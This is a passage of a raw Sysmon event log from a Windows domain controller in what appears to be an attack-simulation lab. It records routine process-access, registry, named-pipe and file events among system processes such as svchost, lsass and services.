12:00:45.487{266CAFBE-646C-6064-1000-00000000AE01}11241736C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.487{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000614) 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.471{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.471{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.471{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.456{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.159{266CAFBE-646C-6064-1000-00000000AE01}1124\Winsock2\CatalogChangeListener-464-0C:\Windows\system32\svchost.exe 17141700x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.159{266CAFBE-646C-6064-1000-00000000AE01}1124\SessEnvPublicRpcC:\Windows\system32\svchost.exe 11241100x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.065{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 17141700x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.065{266CAFBE-646C-6064-1000-00000000AE01}1124\atsvcC:\Windows\system32\svchost.exe 17141700x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.049{266CAFBE-646A-6064-0B00-00000000AE01}856\Winsock2\CatalogChangeListener-358-1C:\Windows\system32\lsass.exe 13241300x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.049{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\srvnet\Parameters\MajorSequenceDWORD (0x000001ae) 17141700x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:45.034{266CAFBE-646A-6064-0B00-00000000AE01}856\Winsock2\CatalogChangeListener-358-0C:\Windows\system32\lsass.exe 13241300x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.018{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000001) 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.018{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.002{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.002{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 